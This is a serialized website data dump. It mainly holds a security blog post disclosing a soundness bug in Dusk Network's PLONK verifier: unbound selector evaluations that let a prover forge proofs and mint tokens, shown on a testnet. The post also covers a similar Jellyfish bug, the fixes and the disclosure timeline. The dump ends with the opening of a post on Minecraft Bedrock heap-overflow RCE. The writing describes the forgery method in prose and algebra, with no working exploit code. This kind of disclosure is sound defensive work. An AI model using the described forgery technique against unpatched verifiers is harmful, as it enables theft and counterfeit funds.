",{"type":25,"tag":82,"props":150187,"children":150189},{"className":150188},[212,4702],[150190],{"type":25,"tag":216,"props":150191,"children":150193},{"className":150192},[224],[150194],{"type":25,"tag":216,"props":150195,"children":150197},{"className":150196,"ariaHidden":230},[229],[150198],{"type":25,"tag":216,"props":150199,"children":150201},{"className":150200},[235],[150202,150206,150263,150268,150273],{"type":25,"tag":216,"props":150203,"children":150205},{"className":150204,"style":5513},[240],[],{"type":25,"tag":216,"props":150207,"children":150209},{"className":150208},[246],[150210,150215],{"type":25,"tag":216,"props":150211,"children":150213},{"className":150212,"style":2325},[246,2151],[150214],{"type":31,"value":148561},{"type":25,"tag":216,"props":150216,"children":150218},{"className":150217},[2159],[150219],{"type":25,"tag":216,"props":150220,"children":150222},{"className":150221},[298,299],[150223,150252],{"type":25,"tag":216,"props":150224,"children":150226},{"className":150225},[304],[150227,150247],{"type":25,"tag":216,"props":150228,"children":150230},{"className":150229,"style":97069},[309],[150231],{"type":25,"tag":216,"props":150232,"children":150233},{"style":2347},[150234,150238],{"type":25,"tag":216,"props":150235,"children":150237},{"className":150236,"style":2181},[319],[],{"type":25,"tag":216,"props":150239,"children":150241},{"className":150240},[2186,2187,2188,2189],[150242],{"type":25,"tag":216,"props":150243,"children":150245},{"className":150244},[246,2189],[150246],{"type":31,"value":21486},{"type":25,"tag":216,"props":150248,"children":150250},{"className":150249},[408],[150251],{"type":31,"value":411},{"type":25,"tag":216,"props":150253,"children":150255},{"className":150254},[304],[150256],{"type":25,"tag":216,"props":150257,"children":150259},{"className":150258,"style":2209},[309],[150260],{"type":25,"tag":216,"props":150261,"children":150262},{},[],{"type":25,"tag":216,"props":150264,"children":150266},{"className":150265},[287],[150267],{"type":31,"value":1850},{"type":25,"tag":216,"props":150269,"children":150271},{"className":150270,"style":117544},[246,2151],[150272],{"type":31,"value":117547},{"type":25,"tag":216,"props":150274,"children":150276},{"className":150275},[427],[150277],{"type":31,"value":1888},{"type":31,"value":7016},{"type":25,"tag":162,"props":150280,"children":150283},{"href":150281,"rel":150282},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/permutation/verifierkey.rs#L24-L104",[166],[150284],{"type":31,"value":150285},"permutation verifier key",{"type":31,"value":24702},{"type":25,"tag":38,"props":150288,"children":150289},{},[150290,150292,150302],{"type":31,"value":150291},"The four selector evaluations fit neither of these safe patterns: they are prover-supplied scalars, they are used directly by verifier code, and they never appear in ",{"type":25,"tag":162,"props":150293,"children":150296},{"href":150294,"rel":150295},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L361-L373",[166],[150297],{"type":25,"tag":82,"props":150298,"children":150300},{"className":150299},[],[150301],{"type":31,"value":149743},{"type":31,"value":150303},", which leaves the master equation underconstrained.",{"type":25,"tag":38,"props":150305,"children":150306},{},[150307],{"type":25,"tag":6467,"props":150308,"children":150311},{"alt":150309,"src":150310},"structural_trust_boundary","/posts/dusk-commitment-issues/structural_trust_boundary.svg",[],{"type":25,"tag":22753,"props":150313,"children":150314},{},[],{"type":25,"tag":26,"props":150316,"children":150318},{"id":150317},"the-exploitation",[150319],{"type":31,"value":150320},"The exploitation",{"type":25,"tag":38,"props":150322,"children":150323},{},[150324],{"type":31,"value":150325},"Since the selector evaluations are free variables, the verification equation becomes a linear equation the prover can solve after the fact.",{"type":25,"tag":38,"props":150327,"children":150328},{},[150329,150331,150337,150339,150344,150346,150351,150353,150359],{"type":31,"value":150330},"The prover commits to arbitrary witness polynomials, without needing a valid witness, and arbitrary quotient polynomials, where small random linear polynomials suffice. It follows the honest protocol through all commitment rounds, deriving the same challenges the verifier will. After seeing ",{"type":25,"tag":82,"props":150332,"children":150334},{"className":150333},[],[150335],{"type":31,"value":150336},"z_challenge",{"type":31,"value":150338},", it computes what the linearization polynomial ",{"type":25,"tag":64,"props":150340,"children":150341},{},[150342],{"type":31,"value":150343},"should",{"type":31,"value":150345}," evaluate to for the pairing check to pass, then solves for ",{"type":25,"tag":82,"props":150347,"children":150349},{"className":150348},[],[150350],{"type":31,"value":149864},{"type":31,"value":150352},", the single free variable that makes the verification equation balance (setting ",{"type":25,"tag":82,"props":150354,"children":150356},{"className":150355},[],[150357],{"type":31,"value":150358},"q_c_eval = q_l_eval = q_r_eval = 0",{"type":31,"value":24702},{"type":25,"tag":38,"props":150361,"children":150362},{},[150363],{"type":25,"tag":6467,"props":150364,"children":150367},{"alt":150365,"src":150366},"exploit_algebra","/posts/dusk-commitment-issues/exploit_algebra.svg",[],{"type":25,"tag":38,"props":150369,"children":150370},{},[150371,150373,150413,150415,150440,150442,150447],{"type":31,"value":150372},"To achieve this one may compute the linearization polynomial ",{"type":25,"tag":82,"props":150374,"children":150376},{"className":150375},[212,4702],[150377],{"type":25,"tag":216,"props":150378,"children":150380},{"className":150379},[224],[150381],{"type":25,"tag":216,"props":150382,"children":150384},{"className":150383,"ariaHidden":230},[229],[150385],{"type":25,"tag":216,"props":150386,"children":150388},{"className":150387},[235],[150389,150393,150398,150403,150408],{"type":25,"tag":216,"props":150390,"children":150392},{"className":150391,"style":5513},[240],[],{"type":25,"tag":216,"props":150394,"children":150396},{"className":150395,"style":2752},[246,2151],[150397],{"type":31,"value":97829},{"type":25,"tag":216,"props":150399,"children":150401},{"className":150400},[287],[150402],{"type":31,"value":1850},{"type":25,"tag":216,"props":150404,"children":150406},{"className":150405},[246,2151],[150407],{"type":31,"value":2541},{"type":25,"tag":216,"props":150409,"children":150411},{"className":150410},[427],[150412],{"type":31,"value":1888},{"type":31,"value":150414}," with all selectors set to zero, evaluating it at ",{"type":25,"tag":82,"props":150416,"children":150418},{"className":150417},[212,4702],[150419],{"type":25,"tag":216,"props":150420,"children":150422},{"className":150421},[224],[150423],{"type":25,"tag":216,"props":150424,"children":150426},{"className":150425,"ariaHidden":230},[229],[150427],{"type":25,"tag":216,"props":150428,"children":150430},{"className":150429},[235],[150431,150435],{"type":25,"tag":216,"props":150432,"children":150434},{"className":150433,"style":6315},[240],[],{"type":25,"tag":216,"props":150436,"children":150438},{"className":150437,"style":117544},[246,2151],[150439],{"type":31,"value":117547},{"type":31,"value":150441},", and comparing to the target value; the difference divided by the coefficient of ",{"type":25,"tag":82,"props":150443,"children":150445},{"className":150444},[],[150446],{"type":31,"value":149864},{"type":31,"value":150448}," gives the required value in a single field division.",{"type":25,"tag":22753,"props":150450,"children":150451},{},[],{"type":25,"tag":26,"props":150453,"children":150455},{"id":150454},"impact-on-dusk-network",[150456],{"type":31,"value":150457},"Impact on Dusk Network",{"type":25,"tag":38,"props":150459,"children":150460},{},[150461,150463,150470],{"type":31,"value":150462},"PLONK is the sole gatekeeper for Phoenix-specific correctness claims: note membership, ownership, note commitments, sender-authorship, and balance integrity are encoded entirely in the circuit. Rusk does check other preconditions such as nullifier uniqueness before it verifies the proof (",{"type":25,"tag":162,"props":150464,"children":150467},{"href":150465,"rel":150466},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/node/vm.rs#L153-L184",[166],[150468],{"type":31,"value":150469},"preverify path",{"type":31,"value":150471},"), but for the claims inside the proof there is no secondary validation path. With forged proofs, an attacker could:",{"type":25,"tag":6711,"props":150473,"children":150474},{},[150475,150480,150485],{"type":25,"tag":2043,"props":150476,"children":150477},{},[150478],{"type":31,"value":150479},"Inflate the token supply by fabricating input notes that do not exist in the note tree, with arbitrary values. The forged proof convinces the network these notes are real, and the attacker mints DUSK out of nothing, ready to transfer to honest users or exchanges.",{"type":25,"tag":2043,"props":150481,"children":150482},{},[150483],{"type":31,"value":150484},"Forge spends that bypass the ownership, membership, and balance checks that normally make a Phoenix input note valid.",{"type":25,"tag":2043,"props":150486,"children":150487},{},[150488],{"type":31,"value":150489},"Move forged shielded funds through honest wallets, because once a forged Phoenix transaction is accepted, the resulting shielded outputs are not distinguishable from legitimate Phoenix outputs at the protocol level.",{"type":25,"tag":38,"props":150491,"children":150492},{},[150493],{"type":31,"value":150494},"We demonstrated this with a full end-to-end proof-of-concept on a local Dusk testnet:",{"type":25,"tag":6711,"props":150496,"children":150497},{},[150498,150503,150513,150525,150530],{"type":25,"tag":2043,"props":150499,"children":150500},{},[150501],{"type":31,"value":150502},"Set up a single honest Rusk node and create two wallets (honest and malicious), both with balance 0",{"type":25,"tag":2043,"props":150504,"children":150505},{},[150506,150508],{"type":31,"value":150507},"The malicious wallet forges a PLONK proof to create ",{"type":25,"tag":9273,"props":150509,"children":150510},{},[150511],{"type":31,"value":150512},"2000 DUSK from nothing",{"type":25,"tag":2043,"props":150514,"children":150515},{},[150516,150518,150523],{"type":31,"value":150517},"The malicious wallet transfers ",{"type":25,"tag":9273,"props":150519,"children":150520},{},[150521],{"type":31,"value":150522},"1337 DUSK",{"type":31,"value":150524}," to the honest wallet using a normal (honestly-proved) transaction",{"type":25,"tag":2043,"props":150526,"children":150527},{},[150528],{"type":31,"value":150529},"The honest node validates both transactions and mines them into blocks",{"type":25,"tag":2043,"props":150531,"children":150532},{},[150533],{"type":31,"value":150534},"The honest wallet shows a confirmed balance of 1337 DUSK",{"type":25,"tag":38,"props":150536,"children":150537},{},[150538],{"type":25,"tag":6467,"props":150539,"children":150542},{"alt":150540,"src":150541},"end_to_end","/posts/dusk-commitment-issues/end_to_end.svg",[],{"type":25,"tag":38,"props":150544,"children":150545},{},[150546,150548,150554,150556,150563],{"type":31,"value":150547},"At the time of discovery, DUSK's market cap was roughly ",{"type":25,"tag":162,"props":150549,"children":150551},{"href":145851,"rel":150550},[166],[150552],{"type":31,"value":150553},"~60M",{"type":31,"value":150555},". The entire shielded transaction layer was at risk. Because Phoenix is privacy-preserving, forged outputs accepted into the shielded pool would have been difficult to distinguish after the fact, similar to Neptune Cash with the ",{"type":25,"tag":162,"props":150557,"children":150560},{"href":150558,"rel":150559},"https://neptune.cash/articles/critical-vulnerability-disclosure",[166],[150561],{"type":31,"value":150562},"Triton VM vulnerability",{"type":31,"value":179},{"type":25,"tag":22753,"props":150565,"children":150566},{},[],{"type":25,"tag":26,"props":150568,"children":150570},{"id":150569},"the-fix",[150571],{"type":31,"value":150572},"The fix",{"type":25,"tag":38,"props":150574,"children":150575},{},[150576],{"type":31,"value":150577},"The fix adds the four selector evaluations to the KZG batch opening check, so they are verified against the selector commitments already present in the verifier key:",{"type":25,"tag":2039,"props":150579,"children":150580},{},[150581,150626],{"type":25,"tag":2043,"props":150582,"children":150583},{},[150584,150586,150597,150599,150605,150606,150612,150613,150619,150620],{"type":31,"value":150585},"Extend ",{"type":25,"tag":162,"props":150587,"children":150590},{"href":150588,"rel":150589},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/compiler/prover.rs#L509",[166],[150591],{"type":25,"tag":82,"props":150592,"children":150594},{"className":150593},[],[150595],{"type":31,"value":150596},"compute_aggregate_witness",{"type":31,"value":150598}," on the prover side to also include ",{"type":25,"tag":82,"props":150600,"children":150602},{"className":150601},[],[150603],{"type":31,"value":150604},"q_arith",{"type":31,"value":7026},{"type":25,"tag":82,"props":150607,"children":150609},{"className":150608},[],[150610],{"type":31,"value":150611},"q_c",{"type":31,"value":7026},{"type":25,"tag":82,"props":150614,"children":150616},{"className":150615},[],[150617],{"type":31,"value":150618},"q_l",{"type":31,"value":10439},{"type":25,"tag":82,"props":150621,"children":150623},{"className":150622},[],[150624],{"type":31,"value":150625},"q_r",{"type":25,"tag":2043,"props":150627,"children":150628},{},[150629,150631,150641],{"type":31,"value":150630},"Add their evaluations to ",{"type":25,"tag":162,"props":150632,"children":150635},{"href":150633,"rel":150634},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362",[166],[150636],{"type":25,"tag":82,"props":150637,"children":150639},{"className":150638},[],[150640],{"type":31,"value":149743},{"type":31,"value":150642}," on the verifier side, so they're checked against the commitments in the verifier key",{"type":25,"tag":38,"props":150644,"children":150645},{},[150646,150648,150655],{"type":31,"value":150647},"This was done in ",{"type":25,"tag":162,"props":150649,"children":150652},{"href":150650,"rel":150651},"https://github.com/dusk-network/plonk/commit/645265b748d2698bcb403b794fc2d58340b340f1",[166],[150653],{"type":31,"value":150654},"commit 645265b7",{"type":31,"value":150656},", which landed on February 14, 2026.",{"type":25,"tag":22753,"props":150658,"children":150659},{},[],{"type":25,"tag":26,"props":150661,"children":150663},{"id":150662},"why-was-this-missed",[150664],{"type":31,"value":150665},"Why was this missed?",{"type":25,"tag":38,"props":150667,"children":150668},{},[150669,150671,150678,150679,150686,150688,150695,150697,150704],{"type":31,"value":150670},"Dusk's stack had been heavily audited: a ",{"type":25,"tag":162,"props":150672,"children":150675},{"href":150673,"rel":150674},"https://github.com/dusk-network/audits/blob/main/core-audits/2023-12_plonk-audit-report_porter-adams.pdf",[166],[150676],{"type":31,"value":150677},"December 2023 audit of dusk-plonk",{"type":31,"value":128322},{"type":25,"tag":162,"props":150680,"children":150683},{"href":150681,"rel":150682},"https://github.com/dusk-network/audits/blob/main/core-audits/2024-09_phoenix-audit-report_jules-de-smit.pdf",[166],[150684],{"type":31,"value":150685},"September 2024 audit of Phoenix",{"type":31,"value":150687},", and a ",{"type":25,"tag":162,"props":150689,"children":150692},{"href":150690,"rel":150691},"https://github.com/dusk-network/audits/blob/main/core-audits/2024-09_rusk-node-library_oak-security.pdf",[166],[150693],{"type":31,"value":150694},"September 2024 Oak Security audit of the Rusk node library",{"type":31,"value":150696},". Dusk's public ",{"type":25,"tag":162,"props":150698,"children":150701},{"href":150699,"rel":150700},"https://dusk.network/news/audits-overview",[166],[150702],{"type":31,"value":150703},"audits overview",{"type":31,"value":150705}," summarizes the broader audit program. The bug still went unnoticed because it hides behind a very easy mental-model mistake.",{"type":25,"tag":38,"props":150707,"children":150708},{},[150709,150711,150716],{"type":31,"value":150710},"At the polynomial level, selectors are public circuit descriptions. A reviewer who keeps that standard PLONK model in mind will naturally think \"selectors are verifier-side\" and move on, overlooking the architectural deviation where Dusk's verifier started consuming prover-supplied selector ",{"type":25,"tag":64,"props":150712,"children":150713},{},[150714],{"type":31,"value":150715},"evaluations",{"type":31,"value":179},{"type":25,"tag":38,"props":150718,"children":150719},{},[150720],{"type":31,"value":150721},"This was a pure proof-system bug, not a Phoenix-circuit bug; the circuit constraints themselves were correctly written. The failure occurred entirely because the verifier accepted proof fields that bypassed the fundamental invariant established earlier: they were neither locally computed nor cryptographically bound to an opening proof.",{"type":25,"tag":38,"props":150723,"children":150724},{},[150725],{"type":31,"value":150726},"The check for this class of bug is mechanical: enumerate every field in the proof's evaluation struct and verify that each one either appears in the opening proof batch or is computed locally by the verifier.",{"type":25,"tag":26,"props":150728,"children":150730},{"id":150729},"a-similar-bug-in-espresso-systems-jellyfish",[150731],{"type":31,"value":150732},"A similar bug in Espresso Systems' Jellyfish",{"type":25,"tag":38,"props":150734,"children":150735},{},[150736,150738,150745],{"type":31,"value":150737},"While investigating PLONK implementations, we found a similar vulnerability in ",{"type":25,"tag":162,"props":150739,"children":150742},{"href":150740,"rel":150741},"https://github.com/EspressoSystems/jellyfish/",[166],[150743],{"type":31,"value":150744},"jf-plonk",{"type":31,"value":150746}," by Espresso Systems. The exact mechanism is different, but the exploitation also boils down to variables that are used in the final check not being cryptographically bound.",{"type":25,"tag":38,"props":150748,"children":150749},{},[150750,150752,150759,150761,150772,150774,150799,150801,150826],{"type":31,"value":150751},"Jellyfish implements UltraPlonk, which extends standard PLONK with ",{"type":25,"tag":162,"props":150753,"children":150756},{"href":150754,"rel":150755},"https://eprint.iacr.org/2020/315",[166],[150757],{"type":31,"value":150758},"Plookup",{"type":31,"value":150760}," lookup arguments. Plookup adds 15 polynomial evaluations to the proof. The function ",{"type":25,"tag":162,"props":150762,"children":150765},{"href":150763,"rel":150764},"https://github.com/EspressoSystems/jellyfish/blob/83e62ed43140d251f8a972033fdd9ddb717c66d7/plonk/src/transcript/mod.rs#L156-L166",[166],[150766],{"type":25,"tag":82,"props":150767,"children":150769},{"className":150768},[],[150770],{"type":31,"value":150771},"append_plookup_evaluations",{"type":31,"value":150773}," was supposed to add all 15 to the Fiat-Shamir transcript before the batching challenge ",{"type":25,"tag":82,"props":150775,"children":150777},{"className":150776},[212,4702],[150778],{"type":25,"tag":216,"props":150779,"children":150781},{"className":150780},[224],[150782],{"type":25,"tag":216,"props":150783,"children":150785},{"className":150784,"ariaHidden":230},[229],[150786],{"type":25,"tag":216,"props":150787,"children":150789},{"className":150788},[235],[150790,150794],{"type":25,"tag":216,"props":150791,"children":150793},{"className":150792,"style":6315},[240],[],{"type":25,"tag":216,"props":150795,"children":150797},{"className":150796,"style":2325},[246,2151],[150798],{"type":31,"value":117888},{"type":31,"value":150800}," is derived. Instead, it only added 6 of the 15, and the remaining 9 evaluations are used in the batched verification check but don't influence ",{"type":25,"tag":82,"props":150802,"children":150804},{"className":150803},[212,4702],[150805],{"type":25,"tag":216,"props":150806,"children":150808},{"className":150807},[224],[150809],{"type":25,"tag":216,"props":150810,"children":150812},{"className":150811,"ariaHidden":230},[229],[150813],{"type":25,"tag":216,"props":150814,"children":150816},{"className":150815},[235],[150817,150821],{"type":25,"tag":216,"props":150818,"children":150820},{"className":150819,"style":6315},[240],[],{"type":25,"tag":216,"props":150822,"children":150824},{"className":150823,"style":2325},[246,2151],[150825],{"type":31,"value":117888},{"type":31,"value":150827},", so the prover can adjust them after the fact to make the check pass.",{"type":25,"tag":38,"props":150829,"children":150830},{},[150831,150833,150839,150841,150847],{"type":31,"value":150832},"The attack requires modifying a single evaluation (",{"type":25,"tag":82,"props":150834,"children":150836},{"className":150835},[],[150837],{"type":31,"value":150838},"key_table_next_eval",{"type":31,"value":150840},") by ",{"type":25,"tag":82,"props":150842,"children":150844},{"className":150843},[],[150845],{"type":31,"value":150846},"delta / (u * v^3)",{"type":31,"value":150848}," to close the gap between the true and expected batched evaluation, which, like the Dusk exploit, reduces to a single field division.",{"type":25,"tag":38,"props":150850,"children":150851},{},[150852,150854,150861,150863,150874],{"type":31,"value":150853},"To our knowledge, Jellyfish's UltraPlonk mode is not currently deployed in production. ",{"type":25,"tag":162,"props":150855,"children":150858},{"href":150856,"rel":150857},"https://github.com/EspressoSystems/jellyfish/pull/867",[166],[150859],{"type":31,"value":150860},"PR #867",{"type":31,"value":150862}," fixed the issue and was tagged as ",{"type":25,"tag":162,"props":150864,"children":150867},{"href":150865,"rel":150866},"https://github.com/EspressoSystems/jellyfish/tree/jf-plonk-v0.8.0",[166],[150868],{"type":25,"tag":82,"props":150869,"children":150871},{"className":150870},[],[150872],{"type":31,"value":150873},"jf-plonk-v0.8.0",{"type":31,"value":150875}," on March 18, 2026.",{"type":25,"tag":22753,"props":150877,"children":150878},{},[],{"type":25,"tag":26,"props":150880,"children":150882},{"id":150881},"toward-standardization",[150883],{"type":31,"value":150884},"Toward standardization",{"type":25,"tag":38,"props":150886,"children":150887},{},[150888,150890,150897],{"type":31,"value":150889},"The fact that two independent PLONK implementations contain the same class of bug, and that ",{"type":25,"tag":162,"props":150891,"children":150894},{"href":150892,"rel":150893},"https://osec.io/blog/2026-03-03-zkvms-unfaithful-claims/",[166],[150895],{"type":31,"value":150896},"similar patterns appear across zkVMs",{"type":31,"value":150898},", suggests this isn't a problem that individual audits alone can solve. The check described above (diff \"evaluations used\" against \"evaluations bound\") is mechanical and could be built into development tooling, CI pipelines, or standardized PLONK verification specifications.",{"type":25,"tag":38,"props":150900,"children":150901},{},[150902],{"type":31,"value":150903},"We're in early discussions with the Dusk team and other stakeholders about what a PLONK standardization effort could look like: a curve-agnostic, backend-agnostic specification of the verification protocol that makes invariants like evaluation binding explicit and checkable.",{"type":25,"tag":38,"props":150905,"children":150906},{},[150907],{"type":31,"value":150908},"The status quo, where each team implements their own PLONK variant from the paper and hopes the auditor catches what they missed, is fragile. A shared, well-reviewed verification spec would reduce the surface area for these bugs and give auditors a concrete checklist to verify against.",{"type":25,"tag":26,"props":150910,"children":150911},{"id":64791},[150912],{"type":31,"value":150913},"Disclosure timeline",{"type":25,"tag":59713,"props":150915,"children":150916},{},[150917,150933],{"type":25,"tag":126930,"props":150918,"children":150919},{},[150920],{"type":25,"tag":126934,"props":150921,"children":150922},{},[150923,150928],{"type":25,"tag":126938,"props":150924,"children":150925},{},[150926],{"type":31,"value":150927},"Date",{"type":25,"tag":126938,"props":150929,"children":150930},{},[150931],{"type":31,"value":150932},"Event",{"type":25,"tag":126958,"props":150934,"children":150935},{},[150936,150949,150962,150974,151000,151020],{"type":25,"tag":126934,"props":150937,"children":150938},{},[150939,150944],{"type":25,"tag":126965,"props":150940,"children":150941},{},[150942],{"type":31,"value":150943},"2026-02-13",{"type":25,"tag":126965,"props":150945,"children":150946},{},[150947],{"type":31,"value":150948},"Dusk vulnerability reported",{"type":25,"tag":126934,"props":150950,"children":150951},{},[150952,150957],{"type":25,"tag":126965,"props":150953,"children":150954},{},[150955],{"type":31,"value":150956},"2026-02-14",{"type":25,"tag":126965,"props":150958,"children":150959},{},[150960],{"type":31,"value":150961},"Dusk acknowledged",{"type":25,"tag":126934,"props":150963,"children":150964},{},[150965,150969],{"type":25,"tag":126965,"props":150966,"children":150967},{},[150968],{"type":31,"value":150956},{"type":25,"tag":126965,"props":150970,"children":150971},{},[150972],{"type":31,"value":150973},"Dusk fix committed",{"type":25,"tag":126934,"props":150975,"children":150976},{},[150977,150982],{"type":25,"tag":126965,"props":150978,"children":150979},{},[150980],{"type":31,"value":150981},"2026-02-27",{"type":25,"tag":126965,"props":150983,"children":150984},{},[150985,150987,150998],{"type":31,"value":150986},"Public ",{"type":25,"tag":162,"props":150988,"children":150991},{"href":150989,"rel":150990},"https://github.com/dusk-network/rusk/releases/tag/dusk-rusk-1.6.0",[166],[150992],{"type":25,"tag":82,"props":150993,"children":150995},{"className":150994},[],[150996],{"type":31,"value":150997},"dusk-rusk-1.6.0",{"type":31,"value":150999}," release published",{"type":25,"tag":126934,"props":151001,"children":151002},{},[151003,151008],{"type":25,"tag":126965,"props":151004,"children":151005},{},[151006],{"type":31,"value":151007},"2026-03-16",{"type":25,"tag":126965,"props":151009,"children":151010},{},[151011,151013,151019],{"type":31,"value":151012},"Jellyfish fix PR opened (",{"type":25,"tag":162,"props":151014,"children":151016},{"href":150856,"rel":151015},[166],[151017],{"type":31,"value":151018},"#867",{"type":31,"value":1888},{"type":25,"tag":126934,"props":151021,"children":151022},{},[151023,151028],{"type":25,"tag":126965,"props":151024,"children":151025},{},[151026],{"type":31,"value":151027},"2026-03-18",{"type":25,"tag":126965,"props":151029,"children":151030},{},[151031,151033,151038,151040],{"type":31,"value":151032},"Jellyfish fix merged in ",{"type":25,"tag":162,"props":151034,"children":151036},{"href":150856,"rel":151035},[166],[151037],{"type":31,"value":151018},{"type":31,"value":151039}," and tagged as ",{"type":25,"tag":162,"props":151041,"children":151043},{"href":150865,"rel":151042},[166],[151044],{"type":25,"tag":82,"props":151045,"children":151047},{"className":151046},[],[151048],{"type":31,"value":150873},{"type":25,"tag":26,"props":151050,"children":151052},{"id":151051},"acknowledgements",[151053],{"type":31,"value":151054},"Acknowledgements",{"type":25,"tag":38,"props":151056,"children":151057},{},[151058],{"type":31,"value":151059},"We thank the Dusk team for responding within a day, coordinating the fix transparently, and engaging on the broader standardization question. We also thank the Espresso Systems team for turning around the Jellyfish patch in under a week.",{"title":7,"searchDepth":6769,"depth":6769,"links":151061},[151062,151069,151070,151071,151072,151073,151074,151075,151076,151077,151078,151079],{"id":145881,"depth":6769,"text":145884,"children":151063},[151064,151065,151066,151067,151068],{"id":145906,"depth":6778,"text":145909},{"id":146707,"depth":6778,"text":146710},{"id":147905,"depth":6778,"text":147908},{"id":147935,"depth":6778,"text":147938},{"id":148216,"depth":6778,"text":148219},{"id":148949,"depth":6769,"text":148952},{"id":149087,"depth":6769,"text":149090},{"id":94272,"depth":6769,"text":149718},{"id":150317,"depth":6769,"text":150320},{"id":150454,"depth":6769,"text":150457},{"id":150569,"depth":6769,"text":150572},{"id":150662,"depth":6769,"text":150665},{"id":150729,"depth":6769,"text":150732},{"id":150881,"depth":6769,"text":150884},{"id":64791,"depth":6769,"text":150913},{"id":151051,"depth":6769,"text":151054},"content:blog:2026-04-30-unverified-evaluations-dusk-plonk.md","blog/2026-04-30-unverified-evaluations-dusk-plonk.md","blog/2026-04-30-unverified-evaluations-dusk-plonk",{"_path":151084,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":151085,"description":151086,"date":151087,"author":127589,"image":151088,"isFeatured":16,"onBlogPage":16,"tags":151090,"body":151093,"_type":6798,"_id":160473,"_source":6800,"_file":160474,"_stem":160475,"_extension":6803},"/blog/2026-06-02-minecraft-heap-overflow-to-rce","Pwning Minecraft: 4-Byte Heap Overflow to RCE","We achieved RCE in Minecraft Bedrock, turning a 4-byte heap overflow into complete client compromise. Learn how a universal, Bedrock-specific technique is used to bypass ASLR and achieve arbitrary read/write primitives.","2026-06-02T12:00:00.000Z",{"src":151089,"width":101226,"height":17580},"/posts/minecraft-heap-overflow-to-rce/title.png",[151091,151092],"minecraft","rce",{"type":22,"children":151094,"toc":160450},[151095,151100,151105,151110,151116,151121,151140,151145,151151,151156,151161,151167,151172,151177,151182,151188,151193,151198,151204,151224,151236,151243,151265,151279,151286,151292,151302,151322,151327,151333,151346,151691,151696,151704,151710,151729,152037,152065,152108,152120,152128,152133,152602,152621,152642,152984,153008,153280,153304,153331,153540,153559,153567,153586,153592,153654,153657,153679,153683,153688,153693,153699,153704,153718,153724,153738,153744,153757,153762,153770,153775,153781,153802,153810,153823,153826,153831,153845,153850,153855,153861,153866,153889,153894,153900,153905,153917,153929,154043,154063,154068,154073,154079,154084,154104,154719,154732,155806,155811,155819,155824,155830,155835,155843,155856,155861,155866,155873,155886,155891,155898,155953,155973,155980,155999,156006,156009,156014,156019,156025,156037,156050,156058,156129,156140,156174,156182,156187,156192,156198,156210,156229,156241,156246,156254,156273,156281,156300,156308,156334,156342,156347,156355,156360,156368,156371,156376,156381,156387,156400,156418,156456,156486,156494,156499,156505,156510,156515,156521,156533,156702,156714,156722,156727,156734,156739,156800,156847,156859,156864,156890,156964,157002,157007,157015,157036,157041,157067,157101,157154,157201,157207,157226,157258,157266,157369,157440,157446,157472,157479,157484,157491,157496,157737,157763,157768,157816,157821,157827,157859,157871,157903,157911,157950,157958,157963,157971,157976,157984,157996,158004,158016,158024,158036,158056,158062,158082,158099,158107,158119,158127,158146,158151,158159,158164,158172,158198,158209,158216,158221,158229,158234,158242,158247,158255,158260,158268,158273,158281,158286,158294,158335,158342,158347,158355,158360,158368,158373,158381,158386,158391,158399,158404,158412,158438,158446,158472,158480,158485,158493,158498,158506,158514,158519,158527,158532,158540,158543,158554,158588,158606,158614,158634,158640,158659,158717,158737,158745,158748,158787,158847,158852,158858,158871,158879,158931,158970,158978,159011,159014,159034,159042,159048,159053,159061,159101,159142,159162,159167,159172,159190,159196,159201,159220,159281,159289,159315,159321,159341,159346,159351,159358,159423,159428,159435,159456,159461,159473,159479,159512,159519,159524,159552,159559,159615,159627,159634,159695,159714,159720,159754,159775,159802,159810,159863,159933,159939,159959,160002,160007,160405,160411,160416,160427,160431,160436,160441,160446],{"type":25,"tag":453,"props":151096,"children":151098},{"id":151097},"pwning-minecraft-4-byte-heap-overflow-to-rce",[151099],{"type":31,"value":151085},{"type":25,"tag":38,"props":151101,"children":151102},{},[151103],{"type":31,"value":151104},"In this post, we explore how we achieved remote code execution with a 4-byte heap overflow on a target with default modern protections - working around Windows' Control Flow Guard and ASLR on a remote client connecting to a malicious server, without any information leaks from the client.",{"type":25,"tag":38,"props":151106,"children":151107},{},[151108],{"type":31,"value":151109},"We present a powerful technique, specific to our target, which can be used to achieve RCE for bug types such as double frees, use-after-frees, and any heap overflow of at least 3 bytes.",{"type":25,"tag":26,"props":151111,"children":151113},{"id":151112},"the-target",[151114],{"type":31,"value":151115},"The Target",{"type":25,"tag":38,"props":151117,"children":151118},{},[151119],{"type":31,"value":151120},"Minecraft is one of the most popular games of all time, with millions of daily players and a large count of community servers actively played by thousands - this, and the lack of research in this area made it an intriguing target.",{"type":25,"tag":38,"props":151122,"children":151123},{},[151124,151126,151131,151133,151138],{"type":31,"value":151125},"There are two main editions: ",{"type":25,"tag":9273,"props":151127,"children":151128},{},[151129],{"type":31,"value":151130},"Minecraft Java Edition",{"type":31,"value":151132},", written in Java and available on desktop platforms (Windows, macOS, Linux), and ",{"type":25,"tag":9273,"props":151134,"children":151135},{},[151136],{"type":31,"value":151137},"Minecraft Bedrock Edition",{"type":31,"value":151139},", written largely in C++ and used on consoles like PlayStation and Xbox, mobile platforms, and also available on Windows.",{"type":25,"tag":38,"props":151141,"children":151142},{},[151143],{"type":31,"value":151144},"Given that we were interested in memory corruption bugs we chose the Bedrock Edition. Specifically, we decided to explore the Windows version as the debugging setup was the one we were most familiar with.",{"type":25,"tag":606,"props":151146,"children":151148},{"id":151147},"choice-of-context",[151149],{"type":31,"value":151150},"Choice of Context",{"type":25,"tag":38,"props":151152,"children":151153},{},[151154],{"type":31,"value":151155},"We focused on a malicious-server -> connecting-client threat model because a server controls many inputs, giving a larger, easier-to-reach attack surface than client->client attacks.",{"type":25,"tag":38,"props":151157,"children":151158},{},[151159],{"type":31,"value":151160},"A server can control a large state which includes: the whole world and all entities within, each connected client state such as the position and view angles, and server-provided resource packs which connecting clients will download and parse.",{"type":25,"tag":606,"props":151162,"children":151164},{"id":151163},"resource-packs",[151165],{"type":31,"value":151166},"Resource 